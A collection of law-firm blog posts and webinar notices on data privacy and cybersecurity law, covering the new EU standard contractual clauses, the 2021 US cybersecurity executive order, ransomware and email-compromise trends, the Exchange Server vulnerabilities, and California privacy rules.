This post was originally posted on The Global Privacy Watch blog.

In a long awaited decision, the European Commission (“Commission’) adopted two new sets of standard contractual clauses (“SCCs”) to reflect the EU’s General Data Protection Regulation (“EU GDPR”) and ‘the realities faced by modern business’ (see the Commission’s press release). These replace the current SCCs that were adopted over 10 years ago under the, now repealed, Data Protection Directive. The EU’s Commissioner for Justice, Didier Reynders, cited the SCCs as providing companies with ‘more safety and legal certainty’ and as being ‘user friendly tools’.

It is important to note that the new set of SCCs is significantly different than the previous set. For example, instead of focusing on the status of the parties as “controller” or “processor,” the new SCCs focus on the location of the parties, regardless of status. This is a significant departure from the prior form.

The two sets of SCCs are (i) for use between controllers and processers inside the EU/EEA, and (ii) for cross border transfers between controllers and processers. Both can be used as of 27 June 2021. Note that the effect of Brexit has added

What are the key takeaways?

  • There are now approved SCCs for intra-EU agreements under Article 28. As a consequence, there is now a “safe harbor” to ensure all of an entity’s processor (Article 28) agreements are compliant. This did not exist previously.
  • The SCCs have a ‘modular approach’, enabling multiple parties to join and use them. Additionally, now there will now only be a need for one agreement addressing both Article 28 and Article 46 requirements. Until the new SCCs came out, there was a need for a different agreement for each of the two Articles.
  • The SCCs account for the Schrems II decision, which in 2020 considered the validity of the previous SCCs in relation to international transfers. The SCCs outline the steps that data controllers/processors must follow to comply with the decision and provide possible supplementary measures that can be taken, if necessary (e.g. encryption, pseudonyms).
  • As part of the Schrems II consideration, both data exporters and importers must warrant that they have carried out a local law assessment (i.e. relating to the jurisdiction that will receive the data) and that they have no reason to believe that local laws/practices would prevent the importer from complying with its obligations under the SCCs.
  • There is an 18 month transition period for controllers and processors to update the current SCCs in their contracts, intra-group transfer agreements etc. This is a welcome improvement on the 12 month period suggested in the November drafts. The previous SCCs can still be included in new contracts until 27 September 2021, but these contracts will then need to be updated within the transition period.

Practical Implications

The new SCCs have made some significant changes in how to implement, and how hard it is to implement, the clauses. The previous SCCs were fairly simple to implement – you just filled out the blanks in the appropriate form (i.e. controller-to-controller, or controller-to-processor) and you were done. The new SCCs are not as easy an exercise. While the original data flows under the original SCCs are still present, the new SCCs recognize that services businesses in the EU shouldn’t be left out of the thinking of the SCCs. And considering the processor in the EU working with foreign (e.g. US) data shouldn’t impose the GDPR on exclusively non-EU data, we now have “processor to sub-processor” and “processor to controller” modules.

In addition to the various modules, there are embedded “options” in the various modules as well (e.g. Clause 13). This is a significantly new format, and one which will require legal counsel to determine which module to use.

Along with the counsel needed to figure out just which modules and options to use in the SCCs, the Schrems II considerations also now demand a much higher level of legal work as part of the execution of the SCCs. Now, parties have to undertake a legal evaluation of whether or not there are local law issues which might make the enforcement of the SCCs provisions (including enforcement by 3d party beneficiaries) problematic. This evaluation has to be documented, and this documentation has to be in a form that is available to a supervisory authority should they request it. This means the documentation can’t be hidden away under attorney-client confidentiality rules. It will need to be available to a public authority.

There are a number of other tactical changes, some of which are welcome (e.g. how to deal with general authorizations of sub-processors) and some of which are less so (e.g. having to identify a specific supervisory authority where the importer doesn’t have an EU Representative). However, these will have significantly less of a “cost to implement” than the new structural and analytical requirements.

How does this affect transfers with the UK?

The SCCs are not applicable to the UK GDPR. However, the UK’s Information Commissioner’s Office (“ICO”) has said it will consider recognizing the SCCs as a valid transfer mechanism under the UK GDPR. In any event, the ICO is planning to propose, and consult on, bespoke UK SCCs for international transfers later this year. That being said, it is possible that the recognition of EU SCCs will be a contingency on the UK retaining its adequacy decision, which is currently under scrutiny. Also, the ICO has already adopted the use of the prior SCCs as part of the Brexit package. It would follow that the UK would have some sort of recognition of the EU SCCs, even in light of the UK’s promulgating their own. This is similar to the way the Swiss and the EU have managed interoperability between each of their own SCCs.

Seyfarth Synopsis:  On May 12, 2021, President Joe Biden issued a very broad, 34 page “Executive Order on Improving the Nation’s Cybersecurity.” The Executive Order, or “EO”, can be found here. This order comes six months after the notorious SolarWinds attack, and mere weeks after other high-profile attacks have invaded our networks, and shut down pieces of the nation’s critical infrastructure causing gasoline shortages in certain parts of the country.

By “force of law” the EO applies only to the federal government and federal government systems. By extension, the EO applies, or will apply, to thousands of government contractors and subcontractors that provide IT goods and services (e.g., software) to the US government. Notably, many of the cybersecurity provisions have yet to be written and many will have to go through a drafting and comment period. Other of the provisions may look “new” but have actually been around for a while (like multi-factor authentication and end-point solutions).

The order does not touch on every aspect of US business, like critical infrastructure, but it is a wonderfully good start as it sets forth certain policies and procedures that every business must (if you are a government contractor) or at least should consider enacting. The clear implication of the EO is that the government, IT contractors and providers, and the private sector can no longer wait around for the next shoe to drop. The time for action is now.

So despite being aspirational (at least for today and for some time in the future), the EO makes probably its most important point in its opening statement (Section 1. “Policy”): “We are all in this together.” Indeed the EO opens by noting:

“(C)ybersecurity requires more than government action. Protecting our Nation from malicious cyber actors requires the Federal Government to partner with the private sector. The private sector must adapt to the continuously changing threat environment, ensure its products are built and operate securely, and partner with the Federal Government to foster a more secure cyberspace.”

Let’s examine below certain pieces of the EO as it applies both to the federal government and government IT contractors and providers. The private sector should note that, similar to other “standards” like the NIST Cybersecurity Framework (issued under the Obama Administration in February 2014), to the extent it doesn’t follow the guidance and the policies in the EO, they might fall squarely in the headlights of plaintiffs’ class action counsel who may say, if it was in the EO, why didn’t you follow the same guidance.

Removing Barriers to Sharing Threat Information

Given their position in providing IT goods and services to the government, the EO notes that the IT providers are in a very good position to know better than the government the threat landscape and incident information that affect the federal systems they serve. But by contract, the IT provider might be precluded from sharing that information with the government.

In response, the EO pledges that within 120 days, amendments to the contractual language already in use by the federal government is to be recommended to ensure that information pertaining to cyber threat intelligence as well as cyber incident response information can be shared promptly, ideally within three days (a three-day period is already in place under certain federal, state and EU guidelines). The EO is clear on this point: information sharing is one of its highest priorities.

Modernizing Federal Government Cybersecurity

Another high priority of the Biden Administration is the modernization of the federal government cybersecurity architecture (see Section Three of the EO):

“To keep pace with today’s dynamic and increasingly sophisticated cyber threat environment, the Federal Government must take decisive steps to modernize its approach to cybersecurity, including by increasing the Federal Government’s visibility into threats, while protecting privacy and civil liberties. The Federal Government must adopt security best practices; advance toward Zero Trust Architecture; accelerate movement to secure cloud services, including Software as a Service (SaaS), Infrastructure as a Service (IaaS), and Platform as a Service (PaaS); centralize and streamline access to cybersecurity data to drive analytics for identifying and managing cybersecurity risks; and invest in both technology and personnel to match these modernization goals.”

What does this mean at the end of the day?

  • Recognizing that the Cloud is likely the future of data storage for the majority of the US Government, yet the cloud has its own set of unique risks and thus needs its own security and incident response strategy;
  • That the government will move towards a recognized system of identity and access management, including mandatory multi-factor authentication; and that
  • The government will adopt encryption of data at rest and in transit.

Enhancing Software Supply Chain Security

This section clearly relates to the government’s previous responses to the SolarWinds cybersecurity attack in December 2020. Here, the EO calls upon the National Institute of Standards and Technology to produce guidelines for enhancing the software supply chain security. This guidance shall include standards, procedures or criteria regarding:

  • secure software development environments, including such actions as:
    • using administratively separate build environments;
    • auditing trust relationships;
    • establishing multi-factor, risk-based authentication and conditional access across the enterprise;
    • documenting and minimizing dependencies on enterprise products that are part of the environments used to develop, build, and edit software;
    • employing encryption for data; and
    • monitoring operations and alerts and responding to attempted and actual cyber incidents;
  • generating and, when requested by a purchaser, providing artifacts that demonstrate conformance to the processes set forth in subsection (e)(i);
  • employing automated tools, or comparable processes, to maintain trusted source code supply chains, thereby ensuring the integrity of the code;
  • employing automated tools, or comparable processes, that check for known and potential vulnerabilities and remediate them, which shall operate regularly, or at a minimum prior to product, version, or update release.

Improving Detection of Cybersecurity Vulnerabilities and Incidents

Finally, like is more common already in the private sector, the EO urges the adoption of endpoint detection and response initiatives to support proactive detection of cybersecurity incidents within federal government infrastructure, active cyber hunting, containment and remediation, and incident response. The hope is that such initiatives will support a “playbook” that would better demonstrate the EO’s mandate to provide a better level of incident response and remediation capabilities throughout all levels and departments of the levels of government.

The above is just a partial list of initiatives that the Biden Administration has put forth in the EO. There are indeed other initiatives that bear close examination like the NIST Cybersecurity Framework, and there are other technologies, like machine learning anomaly detection devices that also can potentially make the federal government more “cyber safe.” But, the most important part of the EO is that now “there is a plan.” A plan that will be reviewed by experts like the NIST, and thereafter refined and put into place. And with all good fortune that plan will spread like wildfire across the whole private sector as well. Then all parts of government and industry will likely be more cyber safe.

As the global pandemic begins to show signs of waning, cyber risk is showing no such easing.  In fact, in a recent survey, over 68% of business leaders reported believing that their cybersecurity risks are increasing, despite their own mitigation strategies. Organizations in this coming year will continue to face a constantly evolving threat landscape and increasing threat actor sophistication. Catastrophic supply-chain breaches in 2020 have made organizations begin rethinking what devices, software, and hardware is trustworthy in their environments. While nation-state actors with significant resources appear to have carried out the recent major supply chain attack(s), even “script kiddie” threat actors are expanding their capabilities and improving their techniques. Several trends are on the horizon for this next year.  They are as follows:

Ransomware Is Evolving to Data Exfiltration and Extortion

Historically, ransomware focused on infiltrating organization endpoints and locking the organization out of their own data. While temporarily paralytic, organizations generally made it through those events by either paying the ransom, or recovering their data from disaster recovery or backup media. Tactics have changed for many ransomware threat actors, however, and now many seek to exfiltrate data in addition to deploying ransomware. They do this so that if an organization fails to pay the ransom amount, then they can fall back on the exfiltrated data to extort the organization. If the organization still fails to pay the new extortion ransom, the data is then leaked, usually on the Dark Web. In the first instance, effective incident management with experienced professionals is critical to managing your way through the incident. In the event of disclosure of data, there are also many issues that arise including potential disclosure of attorney-client communication, work product, trade secrets, and PHI/PII. Our prior blog post covers this specific situation in more detail.

Email Compromise Events Will Rise Along with Wire Fraud

Incidents involving threat actors gaining access to organizational email accounts will continue to rise in 2021. This increase can be attributed to password re-use, credential harvesting attacks, data leaks following a breach or extortion event, malware, phishing, smishing, etc. Motivation for these attacks typically involve obtaining information that can be used to facilitate other types of attack. Threat actors steal signature lines, email recipient metadata, prior dealing information, and payment information. This allows a threat actor to set up convincing-looking emails/invoices to perpetrate bank fraud. This comes in the form of requesting a fake invoice be paid or bank information changed. Unfortunately, this person-in-the-middle type attack often goes undetected by the legitimate employees involved. In 2021, organizations should focus on employee training to increase awareness, sophistication, and “cyber-suspicion” of their employees. Organizations will benefit from taking a closer look at their email system logging to ensure that requisite logs are available to conduct investigations following a business email compromise.

To review Seyfarth’s full 2021 Commercial Litigation Outlook, click here.

You may also register for Seyfarth’s webinar regarding Post-Pandemic Trends and Emerging Challenges in 2021 here

This month, the cybersecurity research firm Volexity found a series of four critical security vulnerabilities in Microsoft’s Exchange Server software.  Since then, vulnerability has been independently verified and confirmed by Microsoft.  It is believed to have been used by foreign-state threat actors for an unknown period of time, extending at least to January, 2021.  Exchange acts as the back-end software that handles email for the vast majority of large organizations; Outlook connects to Exchange to display email for user accounts.

While the vulnerability does not affect customers running Microsoft’s Exchange Online service exclusively, most organizations in the US are running some form of Internet-facing Microsoft Outlook Web Access (OWA) for their email systems in tandem with Exchange servers.

Companies that use Microsoft Exchange Server for email messaging in any version should take immediate steps to address the situation.  Office 365 is not affected, but companies with physical Exchange servers combined with Office 365 would still be vulnerable.  The vulnerability effects every version of Microsoft Exchange Server from 2010 through 2016.  The exploited vulnerability and potential back door allows a remote attacker full access and control of the organization’s Exchange server, including all the data residing on it—emails, attachments, contacts, notes, tasks, calendar items, etc.  Attackers using the vulnerability can also identify a mailbox by user name and view or copy the entire mailbox contents.

The seriousness of the issue is difficult to understate.  Using the exploit, intruders are able to leave behind one or more “web shell,” scripts for future use.  A web shell is an easily-operated, password-protected hacking tool that can be accessed from any browser over the Internet; they are also commonly used for legitimate functions, and thus difficult to identify as malware by file type alone. Continue Reading Organizations Using Microsoft Exchange Mail Server Face Severe Cybersecurity Threat

Seyfarth Synopsis:  The attorney-client privilege is a bedrock legal principle that protects a client from providing a court or adversary with confidential communications exchanged in the course of providing or receiving legal advice with an attorney.  Cybersecurity data breach, often accompanied by ransom/extortion demands and threats of publication of sensitive information, diminish the attorney-client privilege protection and raise ethical issues as to an attorney’s duty in protecting the privilege from being waived.  Continue Reading Ransomware with Data Exfiltration and Threatened Leak Extortion

A nationwide fraudulent unemployment benefits cyber scam has been making headlines for many months now and still continues to threaten employers and countless individuals throughout the United States.   Threat actors continue to exploit overwhelmed governmental agencies and are filing claims for benefits using the personal information of people who have not lost their jobs.  The false claims have been estimated in the hundreds of millions of dollars of fraudulent unemployment claims being paid to threat actors.  This fraud is a sharp reminder that sensitive personal information in the wrong hands can result in tremendous harm.  Employers should remain vigilant and alert their workforce, promptly challenge fraudulent claims, and check cyber-security practices and policies to help protect against this and other cyber threats.

It is estimated that nearly 53 million unemployment claims were filed during the few months of the coronavirus pandemic and the threat has continued into 2021.  Many state agencies, already understaffed and functioning with older technology and fraud detention protocols, were not prepared for the onslaught and have become tremendously overwhelmed.  The resulting delays and chaos in processing so many unemployment claims in such a short time has set the perfect stage for threat actors to take advantage.

Under normal circumstances, when the unemployment claim is filed, the agency will send  timely notice to the employer to provide the opportunity to protest the claim.  Typically the employer has ten days to protest.  However, during the pandemic, unemployment offices across the country have struggled to get the notices out to employers – taking months rather than days.  Consequently, employers are receiving the protest notices after the time has expired to protest the claim.  Most people learn they are affected when they get a notice from the state unemployment benefits office about their supposed application for benefits.  By then, however, the benefits usually have been paid to an account the criminals control.  Further, it is not clear given the magnitude of claims and impact on individuals whether in some instances agencies are paying even before they send the protest notice. Continue Reading COVID-19 Unemployment Benefits Scams Continue Well Into the Pandemic

Business executives face the challenge of improving their company’s cybersecurity posture while balancing costs. The consequences of a cyberattack – including lost revenue, customers, diminished reputation and credibility, or even total shut down – force executives to prioritize cybersecurity within their budgets and strategize how to best allocate their limited resources. How should business executives prioritize improving their cybersecurity postures in the most cost-effective way?

Join us for this web event where Joe Rooney of BDO will moderate a discussion between Ric Opal of BDO Digital and Scott Carlson of Seyfarth Shaw to share what cybersecurity strategies and industry trends they are seeing in the market from an executive perspective. Azure Security Center addresses the three most urgent security challenges:

We’ll look at:

  • Trending cybersecurity legal risks that businesses are facing – including breach prevention, incident response, employee training, and resulting litigation
  • What businesses are doing to successfully implement a cybersecurity strategy
  • If you do nothing else, do these three things to protect your organization, data, and people

Speakers

Scott Carlson, Partner, Seyfarth Shaw LLP
Ric Opal, Principal, BDO Digital, LLC

Moderator

Joe Rooney, Business Development, BDO USA, LLP

California has once again decided it needed to pass privacy legislation to protect the residents of the great state from the nefarious actions of Big Tech. However, this time they did it with a ballot initiative and not via the thoughtful (mostly) mechanism of the legislative process. The proponents of the California Privacy Rights Act of 2020 (“CPRA”) touted this as an improvement over the CCPA – but is it really? To listen to the proponents of the CPRA, it aims to strengthen California consumer privacy rights, while for the most part, avoiding the imposition of overly-burdensome requirements on a business, particularly those businesses that are already CCPA compliant. So, what’s changed, really? Continue Reading California Prop 24 – Is the New Privacy Law Really New (Or Is the Sky Falling)

From court closures and the way judges conduct appearances and trials to the expected wave of lawsuits across a multitude of areas and industries, the COVID-19 outbreak is having a notable impact in the litigation space—and is expected to for quite some time.

To help navigate the litigation landscape, we are kicking off a webinar series that will take a look at what’s happening now and what to expect in terms of litigation practice and litigation trends in the months to come. The initial webinars detailed below will be supplemented by topic-specific programs that will take a deeper dive into the respective topics. Feel free to attend one or all, and please invite your colleagues.


Court Is “In Session”: The Post-Pandemic Courthouse

In the first installment of our Post-Pandemic Litigation Webinar Series, Seyfarth litigators from a variety of legal disciplines will examine the virtual courthouse in a post-pandemic world. Specifically, our presenters will address:

  • What is going on in courts across the country, and how/when are they rescheduling
  • How will state, federal, and bankruptcy courts run post-pandemic
  • Will we be able to have jury trials
  • How long this “new normal” is expected to last
  • Necessary tools needed to adapt and keep your cases moving forward
Moderator:

Scott Carlson, Partner, Seyfarth Shaw

Speakers:

Suzanna Bonham, Partner, Seyfarth Shaw
Gina Ferrari, Partner, Seyfarth Shaw
William Hanlon, Partner, Seyfarth Shaw
Scott Humphrey, Partner, Seyfarth Shaw

Tuesday, July 14, 2020

1:00 p.m. to 2:00 p.m. Eastern
12:00 p.m. to 1:00 p.m. Central
11:00 a.m. to 12:00 p.m. Mountain
10:00 a.m. to 11:00 a.m. Pacific

If you have any questions, please contact Colleen Vest at cvest@seyfarth.com and reference this event.


New Era, New Litigation: Lawsuits You Can Expect in the Post-Pandemic Environment

During the second installment of our Post-Pandemic Litigation Webinar Series, our panel will provide high-level insights on what companies of all sizes can expect in terms of litigation as a result of COVID-19. Specifically, our presenters will address the high-level trends we are observing in the following areas:

  • Bankruptcy and Financial Services
  • Class Actions and TCPA
  • Commercial Litigation
  • Construction and Real Estate Litigation
  • Health Care, Life Sciences, and Pharmaceutical
  • Securities Litigation
  • Trade Secrets and Cybersecurity/Privacy
Moderator:

James McGrath, Partner, Seyfarth Shaw

Speakers:

Kristine Argentine, Partner, Seyfarth Shaw
Jesse Coleman, Partner, Seyfarth Shaw
Tonya Esposito, Partner, Seyfarth Shaw
Richard Lutkus, Partner, Seyfarth Shaw
Kate Schumacher, Partner, Seyfarth Shaw
Rebecca Woods, Partner, Seyfarth Shaw

Wednesday, July 22, 2020

1:00 p.m. to 2:00 p.m. Eastern
12:00 p.m. to 1:00 p.m. Central
11:00 a.m. to 12:00 p.m. Mountain
10:00 a.m. to 11:00 a.m. Pacific

If you have any questions, please contact Danielle Freeman at dfreeman@seyfarth.com and reference this event.

Yesterday, California Attorney General Xavier Becerra announced his submission of the Final Regulations under the California Consumer Privacy Act (CCPA) to the California Office of Administrative Law (OAL).  Under the California Administrative Procedure Act (APA), the OAL has 30 business days plus 60 calendar days (due to a COVID-related executive order) to determine whether the regulations meet the requirements of the APA.  This final submission comes after various public forums, hearings, commentary, and revisions to the regulations.

Back in April, we discussed our expectations for the Final Regulations, which remain largely unchanged from the March 11, 2020 draft.  In that post, we assessed certain elements of the Regulations that seemed to be in flux, such as notice at collection, and of financial incentives, consumer opt-out rights, and the handling of requests to know and delete.

An important note is that the AG has requested an expedited timeline for OAL review in order to make the July 1 date for enforcement applicable.  Specifically, Attorney General Becerra points to his particularly early submission of his rulemaking package in advance of his October deadline. This is in support of his request for the OAL to expedite their review consistent with the standard 30 business day requirement, which would bring the Regulations’ effective date close to in line with the CCPA’s specified July 1, 2020 enforcement date. Continue Reading California Attorney General Becerra Publishes Final Text of Proposed CCPA Regulations